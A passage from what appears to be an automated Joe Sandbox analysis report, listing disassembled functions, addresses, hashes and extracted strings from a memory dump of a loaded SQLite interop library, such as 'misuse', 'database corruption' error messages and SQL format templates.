                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I9196a02c851acbfb.$I943321d364f02e5d.
                                                                                      • String ID: h#Pl$string or blob too big
                                                                                      • API String ID: 3065740290-918290046
                                                                                      • Opcode ID: d7aec77f5f81d9a9df241519a8b34f0225e6149196f1a361551875e2324c850e
                                                                                      • Instruction ID: 36ce6430ff671113d458bb81d591d702b16fddb692fea75778c6bfbccc7a1fc2
                                                                                      • Opcode Fuzzy Hash: d7aec77f5f81d9a9df241519a8b34f0225e6149196f1a361551875e2324c850e
                                                                                      • Instruction Fuzzy Hash: F731F33160471097D7328E288840B96B3A5AB0972CF244B1EE5B65BED1D762FD058BA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C446930 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 98COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000294C2,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?,?,6C446B67,?,?,00000000,00000000,00000000), ref: 6C44695A
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C446953
                                                                                      • unknown database: %s, xrefs: 6C4469B7
                                                                                      • misuse, xrefs: 6C44694E
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C446944
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse$unknown database: %s
                                                                                      • API String ID: 1952225102-2690663923
                                                                                      • Opcode ID: 4c27586c79bc132bfe4e3d280813a8e7c1664ccd9150a3b9ddf01cb0e523173b
                                                                                      • Instruction ID: 02ac51e7d480af9c4510e0ebec92e162463cb81bb381f1d84c14d6756edc6615
                                                                                      • Opcode Fuzzy Hash: 4c27586c79bc132bfe4e3d280813a8e7c1664ccd9150a3b9ddf01cb0e523173b
                                                                                      • Instruction Fuzzy Hash: B2313071300B419BFB20DF259C44FDB77A5EB8176AF24852EE829D7B80EB70D8058791
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3F4430 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4B4840: SI950480ab972e108d.SQLITE.INTEROP(00000015,API called with NULL prepared statement,?,?,?,6C4B45F9,?,?,?,?,?,6C40EDB8,?,?,?,?), ref: 6C4B4852
                                                                                        • Part of subcall function 6C4B4840: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00014FD9,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C4B49A9
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(00000000), ref: 6C3F44B3
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00028F69,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C3F44EF
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C3F44E8
                                                                                      • misuse, xrefs: 6C3F44E3
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C3F44D9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.$I9c6d7cd7b7d38055.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 2048113676-1203237178
                                                                                      • Opcode ID: e8927b12ad5b4f9389c2fcce8a80aac0a7d9882d0688b6063b755f8d0c9eda36
                                                                                      • Instruction ID: 2854d3a295453dc9a689a2ff38744b32b54bfb3446c88907584038922b09df85
                                                                                      • Opcode Fuzzy Hash: e8927b12ad5b4f9389c2fcce8a80aac0a7d9882d0688b6063b755f8d0c9eda36
                                                                                      • Instruction Fuzzy Hash: F931F571B002149BDB00DB69ED44F5AB7E9EF88329F184169ED0CE7B41E732E9058AD1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4C9C10 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000108DA,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?,00000000,?,6C4C99A4), ref: 6C4C9C48
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000108E8,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?,00000000,?,6C4C99A4), ref: 6C4C9CDD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$database corruption
                                                                                      • API String ID: 1952225102-2363313300
                                                                                      • Opcode ID: ebb2eb92f53c3cb50a195edd74fdc0c96f3ed08cba6f0db932cf698b0f19e6ca
                                                                                      • Instruction ID: 05411e2970e6480f01bba9e8b95cabfd437b158c4441348d927ee5373996a834
                                                                                      • Opcode Fuzzy Hash: ebb2eb92f53c3cb50a195edd74fdc0c96f3ed08cba6f0db932cf698b0f19e6ca
                                                                                      • Instruction Fuzzy Hash: 5F31F3366045916BC310DF2AD980EA5FBE0FF5531AF0402AAE85CCBB82D725E96087E1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4CAEC0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000104D9,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,00000000,?,?,00000000,?,?,?,?,?,6C4C801E,zLl), ref: 6C4CAEF3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$database corruption
                                                                                      • API String ID: 1952225102-2363313300
                                                                                      • Opcode ID: 375fbfea2b521e97273d82e4b20ceb6096a8b2992714d68db3a8009023ccd7ad
                                                                                      • Instruction ID: d7185461ff99668051dbe883fd61144fe3d197a3e7f7bfef0ffa4821eff359bc
                                                                                      • Opcode Fuzzy Hash: 375fbfea2b521e97273d82e4b20ceb6096a8b2992714d68db3a8009023ccd7ad
                                                                                      • Instruction Fuzzy Hash: CD3149B57042459FDB00DF69D880FE5B7A1AF9430AF24496DE9488BB41E7719841C7F2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C464E50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 89COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C477A30: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00020832,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?,?,?,6C40EF31,?,00000080,00000000,?,?), ref: 6C477B29
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,?,?,?,00000000,?,6C464E33,00000000), ref: 6C464E8A
                                                                                        • Part of subcall function 6C4B57B0: SI950480ab972e108d.SQLITE.INTEROP(00000015,API called with NULL prepared statement,?,00000000,00000000,?,6C47D2D6,?,?,?,00000000,00000000,?), ref: 6C4B57CC
                                                                                        • Part of subcall function 6C4B57B0: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00014D90,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,00000000,00000000,?,6C47D2D6,?,?,?,00000000,00000000,?), ref: 6C4B580C
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,?,?,?,?,?,?,00000000,?,6C464E33,00000000), ref: 6C464EE4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.$I9c6d7cd7b7d38055.
                                                                                      • String ID: 3NFl$CRE$INS
                                                                                      • API String ID: 2048113676-2695267403
                                                                                      • Opcode ID: 229c0c6cd6a92c8846d717aaeb045b7ff7fc34972cdacb0cfb847d56e2f79bfd
                                                                                      • Instruction ID: 21c4d45464e7b45341fb6db36fcc2ec843ce79ce031afeacf993588983d821cc
                                                                                      • Opcode Fuzzy Hash: 229c0c6cd6a92c8846d717aaeb045b7ff7fc34972cdacb0cfb847d56e2f79bfd
                                                                                      • Instruction Fuzzy Hash: A221FBB5A0530153EA01DA21AC51F6F72989B8159DF14463CFC51A6F85F721EE0982E3
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3F48D0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000002,00000004,00000000), ref: 6C3F497E
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,00000002,00000004,00000000), ref: 6C3F4984
                                                                                        • Part of subcall function 6C3F55A0: SIdba35b6dcb77d463.SQLITE.INTEROP(?,00000000,00000000,00000000,?), ref: 6C3F55D1
                                                                                        • Part of subcall function 6C3F55A0: SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,?,00000000,00000000,00000000,?), ref: 6C3F55D9
                                                                                      Strings
                                                                                      • version, xrefs: 6C3F4969
                                                                                      • DELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';, xrefs: 6C3F48F0
                                                                                      • DELETE FROM %Q.'%q_docsize';, xrefs: 6C3F4914
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I46481015c7f49c68.I9c6d7cd7b7d38055.Idba35b6dcb77d463.Ifc350ae509dc2b53.
                                                                                      • String ID: DELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';$DELETE FROM %Q.'%q_docsize';$version
                                                                                      • API String ID: 3975847599-2744956003
                                                                                      • Opcode ID: 07314c71ed6dc92762cbd1ffd34added2515b81503aa0062b120b89ff4f7c874
                                                                                      • Instruction ID: ea3bda4c37ae9db73a75192b3a2eb74c43f8118953bf30d94a1ed18bc5d465c1
                                                                                      • Opcode Fuzzy Hash: 07314c71ed6dc92762cbd1ffd34added2515b81503aa0062b120b89ff4f7c874
                                                                                      • Instruction Fuzzy Hash: 372108B57002016BD6109A158D05F5776EA9F8432CF148A2CFD79D3B81F732E9198FE6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C41E150 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C41E310: SI1c7a7970970b9619.SQLITE.INTEROP(%z%s"%w"."%w"."%w" IS NOT "%w"."%w"."%w",00000000,6C4F7DBC,?,?,?,?,?,?,?,?,?,?), ref: 6C41E35A
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(SELECT * FROM "%w"."%w", "%w"."%w" WHERE %s AND (%z),?,?,?,?,6C41E0C3,00000000,?,00000000,?,?,6C41E0C3,?,?), ref: 6C41E190
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C41E1DA
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?), ref: 6C41E1FA
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C41E217
                                                                                      Strings
                                                                                      • SELECT * FROM "%w"."%w", "%w"."%w" WHERE %s AND (%z), xrefs: 6C41E18B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.I9c6d7cd7b7d38055.$Ifc350ae509dc2b53.
                                                                                      • String ID: SELECT * FROM "%w"."%w", "%w"."%w" WHERE %s AND (%z)
                                                                                      • API String ID: 2109053394-1366569373
                                                                                      • Opcode ID: ee4841cd0614bcd9dff1b624f8a8684068cee40481a35098e1633b55f8f5758d
                                                                                      • Instruction ID: 396798558f27cfd7b9ab2d28d4028e545f03ab330e64274fe2181c51c9ee1133
                                                                                      • Opcode Fuzzy Hash: ee4841cd0614bcd9dff1b624f8a8684068cee40481a35098e1633b55f8f5758d
                                                                                      • Instruction Fuzzy Hash: FA21F7B9B04200BBEB00DA99DC81EBAB7B5EF44218F104179E91AD7F51E732ED1487E1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C43E6F0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(illegal first argument to %s,matchinfo), ref: 6C43E71A
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,000000FF,000000FF,00000001), ref: 6C43E73D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.Ifc350ae509dc2b53.
                                                                                      • String ID: fts3cursor$illegal first argument to %s$matchinfo
                                                                                      • API String ID: 1339256467-137849849
                                                                                      • Opcode ID: 7b613a35378d835bc9b4085acb514dd84244de9689275e54d1fa3a0095196659
                                                                                      • Instruction ID: c1e328d84cee9231cc60693478c3fa14d9f63396c7d59450a23d0d166cac7738
                                                                                      • Opcode Fuzzy Hash: 7b613a35378d835bc9b4085acb514dd84244de9689275e54d1fa3a0095196659
                                                                                      • Instruction Fuzzy Hash: 2821C536F1412457DB00DE19A845DAA375ACFC833EF28466DEC2C8B781DB26D85786D2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C424C30 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 77COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4B4840: SI950480ab972e108d.SQLITE.INTEROP(00000015,API called with NULL prepared statement,?,?,?,6C4B45F9,?,?,?,?,?,6C40EDB8,?,?,?,?), ref: 6C4B4852
                                                                                        • Part of subcall function 6C4B4840: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00014FD9,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C4B49A9
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,?,?), ref: 6C424C8C
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00028F69,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?), ref: 6C424CC5
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C424CBE
                                                                                      • misuse, xrefs: 6C424CB9
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C424CAF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.$I9c6d7cd7b7d38055.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 2048113676-1203237178
                                                                                      • Opcode ID: bf467441e43d1b8fec39268d9c78cbbc26c9e18e89eb2841ec63c087ad61b9a6
                                                                                      • Instruction ID: 7cdd345e2e5b15b5d153dbac594e969e4437aa0c36cfc2580d1ed5b9991ebfe4
                                                                                      • Opcode Fuzzy Hash: bf467441e43d1b8fec39268d9c78cbbc26c9e18e89eb2841ec63c087ad61b9a6
                                                                                      • Instruction Fuzzy Hash: FC21D475B002008BDB04DB2EEC85D5AB7E9EF84269B19816AEC09D7B01E775E8148AD1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C41E230 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(SELECT * FROM "%w"."%w" WHERE NOT EXISTS ( SELECT 1 FROM "%w"."%w" WHERE %s),?,?,?,?,?,?,?,?), ref: 6C41E254
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C41E29B
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C41E2C0
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C41E2DD
                                                                                      Strings
                                                                                      • SELECT * FROM "%w"."%w" WHERE NOT EXISTS ( SELECT 1 FROM "%w"."%w" WHERE %s), xrefs: 6C41E24F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I9c6d7cd7b7d38055.$I1c7a7970970b9619.Ifc350ae509dc2b53.
                                                                                      • String ID: SELECT * FROM "%w"."%w" WHERE NOT EXISTS ( SELECT 1 FROM "%w"."%w" WHERE %s)
                                                                                      • API String ID: 2449332619-1508026296
                                                                                      • Opcode ID: f0efd9aa7a8ebb41501dc2d95e9bdd6dc73608a0b691fff2806e663f24b957cd
                                                                                      • Instruction ID: 68f9ab7059ed4d5ef503eab46bea32325e3b6d88823fe99e1524db86c416ff7f
                                                                                      • Opcode Fuzzy Hash: f0efd9aa7a8ebb41501dc2d95e9bdd6dc73608a0b691fff2806e663f24b957cd
                                                                                      • Instruction Fuzzy Hash: 1321F3B9B04204BBDB00DE59EC80EAABBA5EB48218F144179FD099BB51E732ED1587D1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4DEFC0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000075D6,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,00000000,00000000), ref: 6C4DEFF6
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4DEFEF
                                                                                      • F, xrefs: 6C4DF031
                                                                                      • misuse, xrefs: 6C4DEFEA
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4DEFE0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$F$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-2838939264
                                                                                      • Opcode ID: 04b1340a92500e9eddb40b65e22c4695f504e1df65cee2c2abb6bc698208c8a3
                                                                                      • Instruction ID: df2278ead9a6fc5ccdeda20b0e07d95df508d5a4db166da5b6a2780fbea5d180
                                                                                      • Opcode Fuzzy Hash: 04b1340a92500e9eddb40b65e22c4695f504e1df65cee2c2abb6bc698208c8a3
                                                                                      • Instruction Fuzzy Hash: CD21B2316093045BD710EF24D851F9BB7E4AFC5329F05491EE98987781EB74A908C7C7
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C462A20 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 74COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
